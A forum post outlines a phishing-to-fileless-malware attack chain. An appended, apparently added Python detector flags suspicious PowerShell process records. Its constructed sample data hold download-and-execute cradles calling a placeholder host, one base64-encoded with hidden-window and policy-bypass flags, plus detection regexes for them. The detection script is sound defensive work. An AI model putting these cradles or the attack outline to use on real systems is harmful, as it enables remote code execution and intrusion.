#9
Hi,
The monetization of attacks is nowadays a matter of a few minutes. Usually highly targeted phishing campaigns last for 20 minutes or even less. This time window is, in most cases, enough to collect a first round of victims (usually quite high, around 15%) that can be used to prepare a second, even more targeted round. This is the way enterprises are hit by highly targeted attacks, and a fileless malware is perfect for these situations:

1. a phish mail (built using the correct mix of social engineering and memetics, to be *really* effective)
2. the mail points to a fake web site (or a trampoline through defaced hosts) that runs on a fast-flux IP for very few minutes
3. the page fingerprints the browser and delivers an ad-hoc fileless malware (crafted in real time by a malware forgery), that contains a payload encrypted well enough (usually two custom encryptions are enough) to use not an original development but even a Metasploit engine.
4. the payload is decrypted in a fileless system, bang, done.

You can use anything ranging from droppers, Metasploit, AutoIt, ... Persistence is not an issue anymore in several situations. Btw, the only reason for speaking of fileless malware today is that the knowledge level required to do one has been decreased by the adoption of PowerShell and by the development of some frameworks (see my first post). Less cumbersome to write, more samples spreading around. The perfect solution for today's attacks, this is the essence of what the reports say ... ;-)
__________________
Ŝħůb-Ňìĝùŕřaŧħ ₪) There are only 10 types of people in the world: Those who understand binary, and those who don't http://www.accessroot.com

Last edited by Shub-Nigurrath; 02-20-2017 at 17:48.
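As an added example that is not part of the post or the thread: the post's point is that PowerShell-based fileless payloads are cheap to produce, so the defender's counterpart is cheap to write too. The script below triages process-creation records for the tradecraft the post describes: an encoded command line (which it decodes so the hidden cradle is inspected as well), a hidden window, an execution-policy bypass, an in-memory download cradle, and an Office parent process. The records, the `example.invalid` domain and the alert threshold are all constructed for this example; the field names are shaped like Sysmon Event 1 / Windows 4688 fields but come from no real log.

```python
import base64
import binascii
import re

# Constructed inner command, kept as plain text so the encoded form can be
# built at runtime instead of hand-typed. The .invalid TLD never resolves.
CONSTRUCTED_INNER = (
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
)
# PowerShell's -EncodedCommand takes base64 over UTF-16LE text.
CONSTRUCTED_B64 = base64.b64encode(
    CONSTRUCTED_INNER.encode("utf-16-le")
).decode("ascii")

# Constructed process-creation records (not taken from any real system).
SAMPLE_EVENTS = [
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -Ep Bypass "
                f"-EncodedCommand {CONSTRUCTED_B64}"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"parent": "OUTLOOK.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/y')\""},
    {"parent": "svchost.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe C:\\notes.txt"},
]

# -e, -ec, -en, -enc, ... -EncodedCommand are all accepted prefixes; the
# alternation is written so that -Ep (ExecutionPolicy) does not match.
ENCODED_RE = re.compile(
    r"(?i)(?<![\w-])-(?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]+)"
)

# Each indicator is a regex run over the visible command line and, when
# present, over the decoded -EncodedCommand payload.
INDICATORS = {
    "encoded_command": ENCODED_RE,
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "policy_bypass": re.compile(r"(?i)-e(?:xecutionpolicy|p)\s+bypass"),
    "download_cradle": re.compile(
        r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"
    ),
    "invoke_expression": re.compile(r"(?i)invoke-expression|\biex\b"),
}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent/invalid."""
    match = ENCODED_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Return the sorted list of indicator names that fire on one record."""
    cmd = event["cmdline"]
    texts = [cmd]
    decoded = decode_encoded_command(cmd)
    if decoded:
        texts.append(decoded)  # inspect what the encoding was hiding
    hits = {name for name, rx in INDICATORS.items()
            if any(rx.search(t) for t in texts)}
    if (event["image"].lower().endswith("powershell.exe")
            and event["parent"].lower() in OFFICE_PARENTS):
        hits.add("office_parent")
    return sorted(hits)


def triage(events, threshold=3):
    """Return (index, indicators) for records with at least `threshold` hits.

    The threshold is a constructed example value; a single indicator such as
    -Ep Bypass is common in legitimate admin scripts, so alerting is on the
    combination rather than on any one flag.
    """
    results = []
    for i, event in enumerate(events):
        hits = analyze_event(event)
        if len(hits) >= threshold:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{idx}] {ev['parent']} -> {ev['image']}: {', '.join(hits)}")
```

The encoded record scores on six indicators and the plain `-c` cradle spawned by Outlook on three, while the scheduled backup script and the notepad process score zero; the point of decoding before matching is that the first record would otherwise show only the launch flags and none of the cradle.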